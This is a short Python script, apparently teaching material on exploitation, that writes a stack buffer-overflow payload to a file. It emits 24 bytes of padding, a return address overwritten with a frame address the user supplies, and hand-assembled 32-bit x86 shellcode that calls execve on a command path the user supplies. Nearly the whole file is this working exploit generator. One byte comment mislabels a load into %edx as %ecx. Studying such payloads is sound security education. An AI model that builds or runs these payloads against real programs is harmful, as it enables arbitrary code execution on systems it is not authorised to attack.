#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Author: Hiroyuki Chishiro
# License: 2-Clause BSD
#

import sys

def main():
    args = sys.argv
    if len(args) != 4:
        print("Usage:", args[0], "[frame address] [cmd_path] [binary file]")
        sys.exit(1)
    frame_addr = args[1]
    cmd_path = args[2]
    binary_file = args[3]

    print("FRAME_ADDR = ", frame_addr, file=sys.stderr)
    print("cmd_path = ", cmd_path, file=sys.stderr)

    shell_code = int(frame_addr, 16)
    zero_data = shell_code + 31
    cmd = zero_data + 4
    ptr_to_zero = zero_data - 4

    with open(binary_file, "wb") as bfile:
        for i in range(24):
            bfile.write(bytes([0x33])) # padding
        bfile.write(shell_code.to_bytes(4, sys.byteorder)) # return address of frame
        bfile.write(bytes([0x31, 0xc0])) # xor %eax, %eax
        bfile.write(bytes([0xa3])) # mov %eax, ZERODATA
        bfile.write(zero_data.to_bytes(4, sys.byteorder))
        bfile.write(bytes([0xb0, 0x0b])) # mov $0xb, %al ; execve
        bfile.write(bytes([0xbb])) # mov CMD, %ebx
        bfile.write(cmd.to_bytes(4, sys.byteorder))
        bfile.write(bytes([0xb9])) # mov PTR_TO_ZERO, %ecx
        bfile.write(ptr_to_zero.to_bytes(4, sys.byteorder))
        bfile.write(bytes([0x8b, 0x15])) # mov ZERO_DATA, %ecx
        bfile.write(zero_data.to_bytes(4, sys.byteorder))
        bfile.write(bytes([0xcd, 0x80])) # int $80
        bfile.write(zero_data.to_bytes(4, sys.byteorder)) # PTR to ZERO_DATA
        bfile.write(bytes([0x55, 0x55, 0x55, 0x55])) # DUMMY (ZERO_DATA)
        bfile.write(cmd_path.encode())
        bfile.write(bytes([0x0a])) # '\n'

if __name__ == "__main__":
    main()
